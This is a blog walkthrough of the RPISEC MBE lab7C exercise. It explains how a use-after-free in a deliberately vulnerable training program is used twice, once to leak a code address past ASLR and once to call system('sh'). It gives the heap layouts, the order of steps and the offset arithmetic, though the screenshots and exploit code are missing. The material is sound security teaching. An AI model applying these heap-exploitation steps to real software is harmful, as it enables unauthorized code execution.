Exploiting the same Use after Free twice to leak the mem layout and execute code - MBE LAB7C walkthrough
The target app
This time we are dealing with a very plain and simple UaF vulnerability. The source code can be found here: https://github.com/RPISEC/MBE/blob/master/src/lab07/lab7C.c
Right away we can see two data structure definitions, which more-less suggest what we are going to be dealing with (structures holding some data along with some function pointers):
While the menu clearly shows what operations are available:
After creating instances of the structures we'll be able to call their dedicated
(* print) pointers.
If you are familiar with Use after Free, you already know it will all boil down to allocating space for one of them, filling it with arbitrary data wherever we can control it, then asking the program to remove it, then allocating another instance of another structure in the same space previously taken by the first one - and then abusing an old pointer used for tracking the first structure to perform the structure-specific operation, making a function call to an arbitrary address we smuggled inside the data of the second structure.
How data is aligned in memory
So, to find out what fields of the
data structures overlap with each other and therefore can be used to decide on the exploitation sequence, first we need to know exactly how data is aligned in memory.
We already know that the
number structure is 16 bytes long, while the
data structure is 32. So we would expect to have to use two
number structures to fill the space previously taken by one
So I ran gdb to find out I was wrong. I allocated three numbers in a row, then took the current heap start address from
vmmap output (important to do this AFTER the first allocation, otherwise you won't even see the
[heap] section in
vmmap output because it won't be allocated by the OS) and had a look. Then I restarted the program and did the same with the
number structure. The results are illustrated by the screenshot below:
As we can see, both structures take 32 bytes (the 16-bit structure is automatically padded to 32 bytes). This is very convenient for us, as we won't have to struggle with aligning different numbers of instances against each other to achieve the favorable alignment allowing us do something neat.
Combining mutually-overlapping fields of both structures to find the proper codexec UaF scenario
So, since I already started with the visualization thing to clearly see the memory layout, I decided to take further advantage of it to compare what fields in one structure correspond to what fields in the other.
On the upper part of the screenshot (
number) function pointers were marked red, actual numbers were marked green. On the lower side of the screenshot (
data) function pointers were marked green, last four bytes of the string were marked red:
Looking at this for just a few seconds made it clear to me how to achieve execution control.
We can see that in the number structure, the function pointer (
0xb770ccb4 on the screenshot above) occupies the same space that, when allocated with a string, always contains at least one nullbyte (
0x00414141 on the screenshot above). This is because the string is automatically null-terminated by
fgets() and we can't control it.
Hence, allocating a number, then deleting it, allocating a string in its place and then requesting the program to print the number won't get us far (we'll crash the program if we call
0x00ANYTHING), as we only control up to three bytes and we are not even overwriting a function pointer, so a partial overwrite won't help us (fgets will always put a null where we want something arbitrary/the most significant byte of the base).
At the same time we can see that the space holding the actual number value (
0x41414141 on the screenshot above) which we can control fully as numbers from all ranges are acceptable), sits in the same place as the function pointer for the string structure (
0xb774dc16 on the screenshot above). Hence, allocating a string, deleting it, creating an arbitrary number and then requesting the string to be printed would effectively lead to the program trying to print the already freed string with code pointed by our newly created number, still treating it as a pointer to the
Let's try it.
We add a string (its contents are irrelevant, we are only interested in having
Now we remove it:
OK. Now we are going to introduce the pointer address we will trick the target program to call (in our final exploit this will be the address of
system()). Let's say we want the program to crash by calling address
0x31337157 (because it's not a valid address in its address space).
Calculating the decimal format:
$ printf "%d" 0x31337157
Now, asking the program to print the string
1 should lead to a segfault at
Yup. And the string itself will be useful to us to control the arguments (so we'll put system()'s address instead of
"sh" as the string, leading to
If we look at the corresponding fields on the heap layout we'll see that first 16 bytes of the string buffer are occupied by the
reserved fields in the number structure, which means that if we allocate a number after removing a string, taking the space it was allocated on, the first 16 bytes of the structure (6 bytes
reserved and 2 bytes of padding) will be left alone with the old values from the string.
system("sh") should be doable:
- create a string "sh"
- delete the string
- create a number == libc system()'s address
- 'print' the string
The only problem we have got left to figure out is how to leak the memory layout to bypass ASLR.
Combining mutually-overlapping fields of both structures to find the proper UaF leak scenario
Looking at the layout again brought me the potential answer to this literally after the first glance (which proves how crucial it is to have the literally see the layout).
As we want to leak memory, we need to call a function taking an argument that happens to be/store a pointer.
The goal is to see both possible states of the memory combined and find such a combination of values that will let us achieve our goal. Let's look at the layout again, this time focusing on two particular neighboring double word values we would like to have in one state - and then think if we can groom the memory into that state:
When the space is occupied by a number structure, the
+0x20 address contains a pointer (the
+0x24 contains data (the number, in this case
0x41414141 - but that's irrelevant to our goal, thus marked grey).
Conversely, when the space is occupied by a data structure, the
+0x20 address contains data (the last three bytes of the string and its terminating nullbyte - useless to us, hence marked gray), while
+0x24 contains a pointer (the
We want to trick the program to create that state, so we can call the
small_num number-printing function, with the address of the string-printing function sitting in the space previously occupied by an irrelevant number before it was
free()'d and then allocated again (but not entirely overwritten!) for the string structure.
So, we create a number, then we remove it (so the
number[index] is not 0, even though the structure it was pointing at was 'removed', which means
Then we create a relatively short (less than 15-character) string, to avoid
fgets() overwriting the last four bytes of the
buff, because that is where the old number's
Let's try this slow motion, using a breakpoint in the main loop:
First, we allocate a number (1):
Now, this is the heap:
Now, we remove the number:
And again, this is the heap (yes, everything is still there after free()):
Now, we make a string up to 16 characters:
Now, this is the heap:
Now, requesting the program to print the
number will make it call
0xb779dbc7 as argument, so we have our leak:
So, we have a number vomited out. Let's convert it to a format more readable to us (hex):
Looks good. Let's confirm in gdb:
Awesome. It looks like we have all the bits and pieces to develop an exploit! :D
Calculating system()'s address
This time I decided to skip leaking the contents of the
printf()'s GOT entry (as I did in https://hackingiscool.pl/mbe-is-fun-lab6a-walkthrough/) to calculate the
Instead, I decided to find out whether libc's
system() address could be calculated based only on the leaked base of the target program's code segment - and it turned out it can! At least on the VM provided for MBE.
Either way, first let's have a look around just like we were about to leak the GOT anyway:
Here are, respectively, our code, rodata and data segments (again, creating a continuous space with fixed offsets from each other):
OK, now we search these ranges for the
0xb7622280 value (the address of
printf()) as we know it has to be stored in GOT after the first
This time (as opposed to what we had in https://hackingiscool.pl/mbe-is-fun-lab6a-walkthrough/), our entry is at
0xfa4 offset in the
rodata (read-only data) segment, which at the time of taking the screenshot above was at base
0xb77b4000. This is most likely the result of the
-z relro gcc compilation flag:
That's OK, this is a countermeasure against GOT overwrites, we don't care about it this time at all.
If we were doing this the usual way, we would leak the code base first. Then we would calculate the
rodata address to then calculate the
printf()'s GOT, so then we would leak
printf()'s address from it. And then based on its fixed offset from
system() within libc itself, calculate
system()'s address. Then get a shell.
But let's try more directly and run the program for a few times, observing the
vmmap output, focusing on the relation between the target app code segment base (which we can already leak) and the libc base (which we want to know as well):
Yup, in both cases the offsets are the same:
Hence, one leak is enough here (which would not be the case for the stack or the heap, but we don't care about those here).
So, once we subtract
0x1dd000 from the leaked target app code base, we have the libc code base.
Now we want to know
system()'s offset within the libc itself (as opposed to calculating the difference from the relative
The required calculations can be done with below python code:
With all this in place, we can already exploit the program.
This exploitation can be easily conducted by just interacting with the program in console by properly choosing menu options and entering simple strings and numbers:
Full python exploit (pwnlib)